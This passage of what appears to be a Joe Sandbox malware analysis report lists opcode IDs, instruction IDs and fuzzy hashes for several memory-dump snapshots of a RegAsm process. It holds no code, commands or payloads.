                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92b8771b722fa6801173c3abcb3468b8fab02812eec4ae6744ee68b58827a538
                                                              • Instruction ID: a62d4eae6adb33e621f185a81f2a9746a6dd673cb333d3730374fce12f98911a
                                                              • Opcode Fuzzy Hash: 92b8771b722fa6801173c3abcb3468b8fab02812eec4ae6744ee68b58827a538
                                                              • Instruction Fuzzy Hash: ED4172356003058FCB19EF78E57856E7BE6FF84204340492CC44A8B658EF399C09CF85
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3ca7fdffd7e30dfd1a7deb8fc869e0c3db2279993e504060665507bfb9b4821
                                                              • Instruction ID: 6c90fd010c8ae3276809415c1c9201a669c0f392a1d4da85268f779030a22819
                                                              • Opcode Fuzzy Hash: a3ca7fdffd7e30dfd1a7deb8fc869e0c3db2279993e504060665507bfb9b4821
                                                              • Instruction Fuzzy Hash: 63218771B043155FDB04AFBE996436EBAEEEFC8610B10483DD48AD7395DD388C068BA5
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00a5067cde89954b6bffbf174dd0b8629e10e2e383d83d6ee32648fd2de8bb7a
                                                              • Instruction ID: abd0fca9ee2928a8c0e6bf337b56fa9c64aa1c381cb9d2a0c14ec9a95cc1a07c
                                                              • Opcode Fuzzy Hash: 00a5067cde89954b6bffbf174dd0b8629e10e2e383d83d6ee32648fd2de8bb7a
                                                              • Instruction Fuzzy Hash: 5831B174D00309DFCB05EF78EA546AE7BB6FF84304F104A69D405AB258DB359A45CF91
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70ce47a88c41af04c37ccaad023025c855a0c7d9117677baa20db65dc9974a7c
                                                              • Instruction ID: e7fde75edba4756b8ef596335cf5e5c1ecba71483fe5311cb4eafe9bf7923d79
                                                              • Opcode Fuzzy Hash: 70ce47a88c41af04c37ccaad023025c855a0c7d9117677baa20db65dc9974a7c
                                                              • Instruction Fuzzy Hash: B8218D74D00209DFCB05EFB8EA54AAEBBBAFF84304F104929D405A7358DB35AA45CB91
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55d8c17cedc512b4b2ad95b59c8c289699cfb44074a29872b42e7486b867b299
                                                              • Instruction ID: 480a94001385704d67c474920350cf9a2f55e2b60ddd52d8ce3b7cd3f8b7495f
                                                              • Opcode Fuzzy Hash: 55d8c17cedc512b4b2ad95b59c8c289699cfb44074a29872b42e7486b867b299
                                                              • Instruction Fuzzy Hash: D4216232700B414BCA6DAB79D46856E7AEABFC42143104D3DC09A8B694DF39DD0A8FC6
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 77707167c80b7371ea6cb3325cc171107f00ba0d71ddf93c7f860a3f7ea4c521
                                                              • Instruction ID: 02787e51a9cd75fa8d331a67caf1ab701dbd377df9634ddce736ff52c8937f3d
                                                              • Opcode Fuzzy Hash: 77707167c80b7371ea6cb3325cc171107f00ba0d71ddf93c7f860a3f7ea4c521
                                                              • Instruction Fuzzy Hash: BA11F1341412199FCB06EF28FB80E5E77A9FF4430DB108A64D0088FA2DD775AA49CF81
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de26a21e77b8d57f7ff3d6b2a4237fd3aa62c31d047e4828daa24b1e3518bfc7
                                                              • Instruction ID: c6e68a4f17f9f71f2d85f5efb0be23111e25b20dd1ee88c125826f31c8df1671
                                                              • Opcode Fuzzy Hash: de26a21e77b8d57f7ff3d6b2a4237fd3aa62c31d047e4828daa24b1e3518bfc7
                                                              • Instruction Fuzzy Hash: BA0199341402299FCB06EF18FB90D5E77A9FF443097119A6490088BA2DD775AA49DF81